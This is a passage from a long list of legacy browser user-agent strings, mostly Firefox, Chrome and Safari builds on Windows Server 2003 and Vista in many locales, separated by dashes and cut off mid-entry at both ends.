Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.3 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.5 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.6 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.2 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/532.9 (KHTML, like Gecko) Chrome/5.0.310.0 Safari/532.9 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.17.8 (KHTML, like Gecko) Version/5.0.1 Safari/533.17.8 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.126 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/7.0.540.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.558.0 Safari/534.10 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.17 (KHTML, like Gecko) Chrome/11.0.652.0 Safari/534.17 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.460.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.462.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.463.0 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.33 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.4 (KHTML, like Gecko) Chrome/6.0.481.0 Safari/534.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.4) Gecko/20091007 Firefox/3.5.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1b3pre) Gecko/20090105 Firefox/3.1b3pre -Mozilla/5.0 (Windows; U; Windows NT 5.2; eu) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.172.0 Safari/530.4 -Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9.1.7) Gecko/20091221 
Firefox/3.5.7 (.NET CLR 3.0.04506.648) -Mozilla/5.0 (Windows; U; Windows NT 5.2; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 5.2; nl; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.1.5) Gecko/Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.2) Gecko/20091111 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-CN; rv:1.9.2) Gecko/20100101 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 5.2; zh-TW; rv:1.9.2.8) Gecko/20100722 Firefox/3.6.8 -Mozilla/5.0 (Windows; U; Windows NT 6.0 (x86_64); de-DE) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre -Mozilla/5.0 (Windows; U; Windows NT 6.0 x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre -Mozilla/5.0 (Windows; U; Windows NT 6.0; bg; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; ca; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; cs; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de-AT; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de-DE) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.0.13) Gecko/2009073022 Firefox/3.0.13 (.NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 (.NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB7.0 (.NET CLR 3.0.30618) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.19) Gecko/2010031422 Firefox/3.0.19 (.NET CLR 3.5.30729) FirePHP/0.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 GTB5 (.NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.10) Gecko/20100504 Firefox/3.5.10 GTB7.0 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; 
rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.2.9) Gecko/20100824 Firefox/3.6.9 ( .NET CLR 3.5.30729; .NET CLR 4.0.20506) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.27 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.29 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.30 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.151.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.152.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.2.153.0 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/0.4.154.31 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.42 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.43 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.46 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.50 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.53 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.59 Safari/525.19 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.10 (KHTML, like Gecko) Chrome/2.0.157.2 Safari/528.10 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.11 (KHTML, like Gecko) Chrome/2.0.157.0 Safari/528.11 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/528.8 (KHTML, like Gecko) Chrome/2.0.156.1 Safari/528.8 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.160.0 Safari/530.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.0 (KHTML, like Gecko) Chrome/2.0.162.0 Safari/530.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.164.0 Safari/530.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.1 (KHTML, like Gecko) Chrome/2.0.168.0 Safari/530.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.4 (KHTML, like Gecko) Chrome/2.0.171.0 Safari/530.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.2 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) 
Chrome/2.0.172.23 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.39 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.40 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.43 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.6 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.173.1 Safari/530.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.6 (KHTML, like Gecko) Chrome/2.0.174.0 Safari/530.6 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/530.7 (KHTML, like Gecko) Chrome/2.0.176.0 Safari/530.7 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.0 Safari/531.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/531.3 (KHTML, like Gecko) Chrome/3.0.193.2 Safari/531.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.10 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.17 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.20 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.21 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.27 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.3 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.196.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.197.11 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.198.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.201.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.202.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.203.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.206.1 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.207.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.208.0 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.2 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.4 Safari/532.0 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/4.0.211.7 Safari/532.0 
-Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.213.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.220.1 Safari/532.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.221.6 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.222.12 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.2 (KHTML, like Gecko) Chrome/4.0.223.0 Safari/532.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.3 (KHTML, like Gecko) Chrome/4.0.224.2 Safari/532.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/532.4 (KHTML, like Gecko) Chrome/4.0.241.0 Safari/532.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.4 Safari/531.21.10 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.1 Safari/533.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.2 (KHTML, like Gecko) Chrome/5.0.342.5 Safari/533.2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.3 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/533.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.127 Safari/533.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.0 Safari/534.13 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Chrome/9.0.601.0 Safari/534.14 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.133 Safari/534.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.20 (KHTML, like Gecko) Chrome/11.0.672.2 Safari/534.20 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.458.1 Safari/534.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/534.8 (KHTML, like Gecko) Chrome/7.0.521.0 Safari/534.8 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.7.13) Gecko/20050610 K-Meleon/0.9 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.12) Gecko/2009070611 Firefox/3.5.12 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 2.0.50727; .NET CLR 3.0.30618; .NET CLR 3.5.21022; .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.6) Gecko/20091201 MRA 5.4 (build 02647) Firefox/3.5.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8 (.NET CLR 3.5.30729) FirePHP/0.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b2) Gecko/20081127 Firefox/3.1b1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b3) Gecko/20090405 Firefox/3.1b3 
-Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.1b4) Gecko/20090423 Firefox/3.5b4 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.2) Gecko/20100316 Firefox/3.6.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.4) Gecko/20100527 Firefox/3.6.4 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.2.8) Gecko/20100722 BTRS86393 Firefox/3.6.8 ( .NET CLR 3.5.30729; .NET4.0C) -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9b3) Gecko/2008020514 Firefox/3.0b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-gb) AppleWebKit/531.22.7 (KHTML, like Gecko) Version/4.0.5 Safari/531.22.7 -Mozilla/5.0 (Windows; U; Windows NT 6.0; en-us) AppleWebKit/531.9 (KHTML, like Gecko) Version/4.0.3 Safari/531.9 -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-AR; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 GTB5 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-ES; rv:1.9.2) Gecko/20100115 Firefox/3.6 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-MX; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; es-es) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fi; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1b1) Gecko/20081007 Firefox/3.1b1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.1b3) Gecko/20090305 Firefox/3.1b3 -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9b5) Gecko/2008032620 Firefox/3.0b5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528+ (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; he-IL) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; hu-HU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; id; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; it; rv:1.9.1b2) Gecko/20081201 Firefox/3.1b2 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.1) Gecko/20090715 Firefox/3.5.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ja; rv:1.9.1.7) Gecko/20091221 Firefox/3.5.7 GTB6 -Mozilla/5.0 (Windows; U; Windows 
NT 6.0; ja; rv:1.9.2.4) Gecko/20100513 Firefox/3.6.4 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; ko; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; nb-NO) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.1.9) Gecko/20100315 Firefox/3.5.9 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; nl; rv:1.9.2.6) Gecko/20100625 Firefox/3.6.6 -Mozilla/5.0 (Windows; U; Windows NT 6.0; pl-PL) AppleWebKit/530.19.2 (KHTML, like Gecko) Version/4.0.2 Safari/530.19.1 -Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 GTB7.1 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9.2) Gecko/20100115 Firefox/3.6 ( .NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; pl; rv:1.9b4) Gecko/2008030714 Firefox/3.0b4 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru-RU) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.1.5) Gecko/20091102 MRA 5.5 (build 02842) Firefox/3.5.5 -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100105 Firefox/3.6 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.9.2) Gecko/20100115 Firefox/3.6 -Mozilla/5.0 (Windows; U; Windows NT 6.0; sr; rv:1.9.0.12) Gecko/2009070611 Firefox/3.0.12 -Mozilla/5.0 (Windows; U; Windows NT 6.0; sv-SE; rv:1.9.0.18) Gecko/2010020220 Firefox/3.0.18 (.NET CLR 3.5.30729) -Mozilla/5.0 (Windows; U; 